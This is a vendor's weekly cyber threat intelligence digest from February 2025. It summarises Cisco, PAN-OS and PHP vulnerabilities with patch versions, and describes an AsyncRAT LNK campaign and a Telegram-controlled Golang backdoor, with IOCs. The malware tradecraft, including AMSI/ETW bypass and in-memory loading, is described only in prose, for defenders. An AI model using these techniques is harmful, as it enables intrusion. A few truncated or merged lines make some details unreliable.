Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Cisco Patches Two Medium Severity Vulnerabilities Affecting its Secure Email Gateway, Video Phone 8875, and Desk Phone 9800 - On February 19, 2025, Cisco patched an email filter bypass vulnerability, CVE-2025-20153, affecting Cisco Secure Email Gateway running Cisco AsyncOS Software version 16.0 or earlier. Cisco also addressed an information disclosure vulnerability, CVE-2025-20158, affecting Cisco Video Phone 8875 and Cisco Desk Phone 9800, running Cisco SIP IP Phone Software version 3.2(1) or earlier with SSH access enabled.
CVE-2025-0108 and CVE-2025-0111 Affecting Palo Alto Networks PAN-OS Software Actively Exploited in the Wild - On February 18 and 20, 2025, CISA added two Palo Alto Networks PAN-OS vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalogue. CVE-2025-0108 is a critical authentication bypass in PAN-OS’ web management interface that allows remote, unauthenticated execution of PHP scripts. CVE-2025-0111 is a high-severity file read flaw that enables remote, authenticated attackers to access files readable by the “nobody” user.
Critical PHP SQL Injection Vulnerability CVE-2022-31631 Could Lead to Data Breaches – On February 13, 2025, cybersecurity firm JOCert published a report detailing CVE-2022-31631, a critical-severity vulnerability in PHP, which is a widely used server-side scripting
Potential Threats
Threat Actor Use LNK Files Disguised as Wallpaper to Deploy AsyncRAT Malware - On February 22, 2025, Cyble reported that a likely Portuguese-speaking threat actor launched a malware campaign using a malicious LNK file disguised as wallpaper featuring a popular anime character to deploy AsyncRAT. AsyncRAT—a well-known remote access trojan—enables data exfiltration, remote command execution, and the installation of additional malware on the victim’s system.
StaryDobry Campaign Uses Fake Game Installers to Deliver XMRig Cryptomining Malware - Threat actors are distributing trojanized versions of popular games through torrent sites as part of the StaryDobry campaign, Kaspersky reported on February 18, 2025. These games include BeamNG.drive, Garry’s Mod, and Dyson Sphere Program. The threat actors behind StaryDobry uploaded these malicious game installers as early as September 2024, exploiting increased holiday torrent activity.
New Golang-Based Backdoor Uses Telegram as C2 Server to Execute Commands – On February 14, 2025, Netskope Threat Labs published an analysis of a newly discovered Golang-based backdoor that uses Telegram as its command-and-control (C2) channel. The backdoor sample, initially shared by @malwrhunterteam on February 4, 2025, uses the filenames "svchost.exe" and "rat.exe". Per Netskope Threat Labs, the backdoor allows threat actors to execute commands, maintain persistence, and self-delete.
General News
CL0P Releases Fourth Round of 50 Obfuscated Victim Names Related to Cleo MFT Exploitation - On February 18, 2025, CL0P Ransomware Group conducted a fourth release of an additional 50 obfuscated victim names related to their exploitation of Cleo’s Managed File Transfer (MFT).
North Korea’s Lazarus hackers behind $1.4 billion crypto theft from Bybit - Cybersecurity researchers say North Korean hackers are behind the largest cryptocurrency heist in history and are actively laundering the more than $1.4 billion in cryptocurrency stolen from the Bybit exchange on Friday.
Apple turns off iCloud encryption feature in UK following reported government legal order - Apple turned off the option for its British users to protect their iCloud accounts with end-to-end encryption on Friday, in the wake of a reported legal order from the British government.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group’s severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Change | Opportunity Change | Intent Change | ||||
|---|---|---|---|---|---|---|---|
| miyak0 | New | → | Basic | (30) | ↑ 30 | (36) | ↑ 36 |
| Porsh | New | → | Basic | (30) | ↑ 30 | (25) | ↑ 25 |
| chestniybro | New | → | Basic | (30) | ↑ 30 | (25) | ↑ 25 |
| GD LockerSec | New | → | Basic | (30) | ↑ 30 | (25) | ↑ 25 |
| GreenBravo | New | → | Basic | (25) | ↑ 25 | (26) | ↑ 26 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren’t disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions,
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | ||||
|---|---|---|---|---|---|---|---|
| Lazarus Group (Cyber Warfare Guidance Unit, Diamond Sleet) | ▲ | Adware | ▲ | CVE-2025-27364 | ▲ | Cryptocurrency | ▲ |
| North Korean Hackers | ▲ | Insider Threat | ▲ | CVE-2024-13159 | ▲ | Microsoft Office 365 | ▲ |
| Cicada3301 Ransomware Group | ▲ | Phishing | ▲ | CVE-2018-0171 | ▲ | Bybit Exchange | ▲ |
| Park Jin Hyok | ▲ | Trojan | ▲ | CVE-2025-26794 | ▲ | Infini | ▲ |
| Medusa Ransomware Group (Frozen Spider, Transforming Scorpius) | ▲ | Cactus | ▲ | CVE-2024-24919 | ▲ | Energy and Natural Resources | ▲ |
Prominent Information Security Events
New Golang-Based Backdoor Uses Telegram as C2 Server to Execute Commands.
Source: Insikt Group, Netskope | TTP Instance
Intelligence Cards: Intelligence & Reports
IOC: SHA256 - dbfb478d52b870bb39d75faa7401c7a7b06e8e88b34ae050d02ff8a0e7545e86
On February 14, 2025, Netskope Threat Labs published an analysis of a newly discovered Golang-based backdoor that uses Telegram as its command-and-control (C2) channel. The backdoor sample, initially shared by @malwrhunterteam on February 4, 2025, uses the filenames "svchost.exe" and "rat.exe". Per Netskope Threat Labs, the backdoor—still under development yet fully functional—allows threat actors to execute commands, maintain persistence, and self-delete. By abusing Telegram as a C2 channel, the backdoor makes distinguishing normal API traffic from malicious activity more difficult for defenders.
Based on Netskope Threat Labs’s analysis, when executed, the backdoor checks if it runs from the C:\Windows\Temp\svchost.exe directory. If not, it copies itself to the specified directory, launches a new process of its copy, and terminates the original process. Once established, the backdoor initiates communication with Telegram by creating a bot instance through the “NewBotAPIWithClient” function. The backdoor then listens for new commands from the threat actor’s Telegram chat. Upon receiving a command, it validates the command and proceeds with execution. The backdoor currently supports the following commands:
- "/cmd”: allows execution of PowerShell commands, sending the output back to the threat actor’s Telegram
- "/persist”: ensures the backdoor relaunches itself in the correct directory
- "/selfdestruct”: deletes the backdoor file, terminates the process, and sends the message “Self-destruct initiated” to the Telegram channel
- "/screenshot”: not yet functional; however, still sends a notification to the threat actor’s Telegram with the message “Screenshot captured"
After performing these commands, the backdoor transmits all results via Telegram to the attacker’s Telegram channel.
Threat Actor Use LNK Files Disguised as Wallpaper to Deploy AsyncRAT Malware.
Source: Insikt Group, Cyble | Validated Intelligence Event
Intelligence Cards: Intelligence & Reports
IOC: SHA256 - 44444b5a4af7742b779a70af5ac7e443cd077ed924924e86f9de2ff932e43e74
IOC: SHA256 - 04fc833b59af93308029d3e87c85e327a1e480508bc78b6a4e46c0cbd65ea8dc
IOC: SHA256 - 26e91d3218cbd4f45da9f293f9647a1dfbf9d3d03aad5bd9ce85423d6e75450c
IOC: SHA256 - f76e582e0b43caad6db6665a17341d94c709ca09dd3e36fc3e588e4566d81502
IOC: SHA256 - 5abf73e0b8d2298167801995077fa414d2e2be2051aff75ad13bfd34d3ed6590
IOC: IP - 76.173.98[.]165
On February 22, 2025, Cyble reported that a likely Portuguese-speaking threat actor launched a malware campaign using a malicious LNK file disguised as wallpaper featuring a popular anime character to deploy AsyncRAT. AsyncRAT—a well-known remote access trojan—enables data exfiltration, remote command execution, and the installation of additional malware on the victim’s system.
The infection chain begins with a malicious LNK file disguised as an anime wallpaper. When victims execute the file, it triggers an obfuscated PowerShell script via cmd.exe. The script creates a web request object to fetch a PowerShell script and executes it directly in memory. This script then downloads and executes additional files, including a batch file output.bat.
The output.bat fetches and executes another PowerShell script which modifies the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) in memory to bypass security defences. The execution chain also incorporates AES encryption and GZIP compression to conceal scripts and payloads, making detection and analysis more difficult. In the final stage, AsyncRAT is executed in memory using reflection loading, ensuring persistence and evading security monitoring. Once active, AsyncRAT provides threat actors with full remote access to the compromised system.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2025-20153 – Update to Cisco AsyncOS version 16-0-0-054
- CVE-2025-20158 – Update to Cisco SIP version 3.3(1)
- CVE-2025-0108 –
-
- PAN-OS 10.1: Upgrade to 10.1.14-h9 or later.
- PAN-OS 10.2: Upgrade to 10.2.13-h3
- PAN-OS 11.0 (EoL): No fixes planned—upgrade to a supported version.
- PAN-OS 11.1: Upgrade to 11.1.6-h1 o PAN-OS 11.2: Upgrade to 11.2.5 or later.
- CVE-2025-0111-
-
- PAN-OS 10.1: Upgrade to 10.1.14-h9 or later.
- PAN-OS 10.2: Upgrade to 10.2.13-h3 or a specified hotfix version (10.2.7-h24, 10.2.8-h21, 10.2.9-h21, 10.2.10-h14, 10.2.11-h12, 10.2.12-h6).
- PAN-OS 11.0 (EoL): No fixes planned
- PAN-OS 11.1: Upgrade to 11.1.6-h1 or a specified hotfix version (11.1.2-h18, 11.1.4-h13).
- PAN-OS 11.2: Upgrade to 11.2.5 or a specified hotfix version (11.2.4-h4).
- CVE-2022-31631 –
-
- PHP 8.0: Upgrade to version 8.0.27
- PHP 8.1: Upgrade to version 8.1.15
- PHP 8.2: Upgrade to version 8.2.2 or later
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.